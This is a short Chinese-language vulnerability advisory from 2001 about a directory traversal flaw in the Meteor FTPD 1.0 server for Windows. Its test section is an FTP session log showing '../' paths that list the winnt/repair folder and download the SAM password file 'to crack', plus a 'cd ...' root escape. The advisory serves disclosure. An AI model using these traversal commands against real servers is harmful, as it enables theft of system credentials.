Meteor FTPD 1.0 存在目录遍历漏洞发布时间:2001-09-29 更新时间:2001-09-29 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Meteor FTPD 1.0详细描述 Meteor FTPD是小型的WINDOWS平台下的FTP服务程序,其中存在目录遍历漏洞可以导致用户绕过FTP ROOT限制而访问系统。 测试代码 220 Service ready for new user Utilisateur (192.168.160.3:(none)) : nbz 331 User name okay, need password Mot de passe : 230- Meteor FTP Version 1.0 230 User logged in, proceed ftp> ls ../winnt/repair/* 200 Command OK 150 About to open data connection . .. setup.log secsetup.inf system software default security sam ntuser.dat autoexec.nt config.nt 226 Closing data connection. Requested file action successful. ftp : 110 octets reçus dans 0,02Secondes 5,50Ko/sec. ftp> get ../winnt/repair/sam sam2crack 200 Command OK 150 About to open data connection 226 Closing data connection. Requested file action successful. ftp : 20480 octets reçus dans 0,01Secondes 2048,00Ko/sec. ftp> ls ../* ftp> cd .. 501 Directory .. does not exist ftp> cd ... 250 ... is current working directory ftp> ls 解决方案 尚无 相关信息 brulez@cartel-info.fr |
